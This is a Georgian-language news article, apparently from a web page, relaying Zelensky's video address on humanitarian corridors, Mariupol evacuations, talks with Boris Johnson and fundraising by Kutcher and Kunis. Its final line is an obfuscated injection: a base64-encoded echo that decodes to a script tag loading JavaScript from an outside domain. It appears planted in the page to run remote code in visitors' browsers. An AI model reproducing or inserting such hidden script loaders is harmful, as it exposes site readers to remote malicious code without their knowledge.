celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტი, ვოლოდიმერ ზელენსკი მორიგ შემაჯამაბელ ვიდეომიმართვას ავრცელებს, სადაც უკრაინელ გმირებს და მოსახლეობას თავგანწირვისთვის მადლობას კიდევ ერთხელ უხდის.
 
მისივე თქმით, 20 მარტს ოთხმა ჰუმანიტარულმა დერეფანმა იმუშავა და და შესაძლებელი გახდა 7 295 მოქალაქე, მათ შორის 4 000 მარიუპოლელი, ზაპოროჟიეში, უსაფრთხო ადგილას გადაეყვანათ. ხვალ კი მარიუპოლელების გადაყვანა გაგრძელდება. 
 
"ხარკოვის ოლქში კი ჰუმანიტარული დერეფანი ჩაიკეტა, რადგან მტერმა ავტობუსებიც და ტვირთიც შეაჩერა. ამ დრომდე ვერ ვუკავშირდებით 5 მძღოლს და ერთ ექიმს. მიუხედავად ყველაფრისა, მოქალაქეებისთვის აუცილებელი საჭიროების ნივთების, ასევე საკვების, წყლისა და მედიკამენტების მიწოდებას არ შევწყვეტთ. 
 
დღეს ხერსონი ქუჩაში გამოვიდა, რისთვისაც მადლობელი ვარ. როგორც ყოველთვის, ისინი დღესაც უკრაინის მხარეს არიან. ეროვნული დროშებით და შიშველი ხელებით ისინი ოკუპანტს და მათ შეიარაღებას დაუპირისპირდნენ. ეს მოტივაციას გვმატებს ვიბრძოლოთ იმ უკრაინისთვის, რომელსაც ვქმნით. 
 
ვესაუბრე ბრიტანეთის პრემიერმინისტრ ბორის ჯონსონს, რომელიც უკრაინის ერთგული და ნამდვილი მეგობარია. მასთან იმ კონკრეტულ დახმარებებზე ვისაუბრე, რაც მომდევნო კვირას დიდი შვიდეულის შეხვედრაზე უნდა გაახმოვანოს. მართალია, ჩვენ ამ ორგანიზაციის წევრები არ ვართ, თუმცა დარწმუნებული ვარ, რომ იქ ერთი ხმა ჩვენს სასარგებლოდ უკვე არის.
 
ეშტონ კეჩერსა და მილა კუნისს ველაპარაკე, წყვილს, რომელსაც ღრმად სწამს ჩვენი და ჩვენი გამარჯვების. ისინი ეხმარებიან უკრაინიდან დროებით, იძულებით გადაადგილებულ პირებს და ჩვენთვის ფულად დახმარებებს აგროვებენ და უკვე შეაგროვეს 35 მილიონი დოლარი. დიდი მადლობა გადავუხადე ჩემი და უკრაინელი ერის სახელით. ვმუშაობთ იმისთვის, რომ მთელი მსოფლიო ჩვენი მეგობარი გახდეს.
 
დღეს დავაჯილდოვე უკრაინელი მზვერავები. მაპატიეთ, მათ სახელებს საჯაროდ ვერ დავასახელებ. თუმცა დამიჯერეთ,  ამ ადამიანების წვლილი ჩვენი უსაფრთხოების დაცვაში იმდენად დიდია, უკრაინის გმირის წოდება და ორდენი მინიმუმია, რისი გაკეთებაც ჩვენ მათთვის შეგვიძლია.
 
დიდი მადლობა მათ და თითოეულ ჩვენს გმირს, იმ ადამიანებს, რომელთა თავგანწირვითაც ვძლებთ. სხვათაშორის, თავს არც თუ ისე ცუდად ვიცავთ, უკრაინა კი ცოცხლობს!"– აღნიშნა უკრაინის პრეზიდენტმა.
 
 
823
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");